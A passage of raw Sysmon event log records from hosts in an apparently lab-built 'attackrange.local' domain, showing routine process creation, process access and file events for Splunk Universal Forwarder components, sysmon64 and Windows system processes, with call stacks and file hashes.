Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245847Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.459{CB4067E1-51E3-6063-B522-00000000AF01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245846Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.411{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=917F6B7B3D9570AB435DB80DF45D4FF9,SHA256=CAB4825A3A32B2CA7D06E9E916522766A293B39B765AF66E2899DCFC0C346AC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245845Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:23.318{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=622095366E154B7146D25B39C806DB45,SHA256=E26BF0DF358E595B7617613B0DFC48E616E82D83815971F4C03236662992D613,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061121Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.684{7F8C56E7-51E4-6063-2401-00000000AF01}53962272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061120Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.559{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51E4-6063-2401-00000000AF01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061119Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061118Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061117Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061116Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.559{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061115Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.559{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-51E4-6063-2401-00000000AF01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061114Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.559{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51E4-6063-2401-00000000AF01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061113Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:24.561{7F8C56E7-51E4-6063-2401-00000000AF01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245888Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51E4-6063-B722-00000000AF01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245887Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245886Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245885Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245884Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245883Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245882Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245881Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245880Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245879Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245878Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-51E4-6063-B722-00000000AF01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245877Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.802{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51E4-6063-B722-00000000AF01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245876Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.803{CB4067E1-51E4-6063-B722-00000000AF01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245875Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.599{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B6092127C5E452C9AC9D30491A38B34,SHA256=6BBA7ED050264E33CB470BB5AE7721719E104068B0093871322F9F334C107713,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245874Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.489{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7B5FCA8F76120500DBBA974D28CA2A5,SHA256=CAF1B9FF1AB6908E7403B930A0E0C9B7A1536C7E42ADA12AAFEB0C72CDDA09F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245873Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:24.130{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51E4-6063-B622-00000000AF01}2492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245872Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 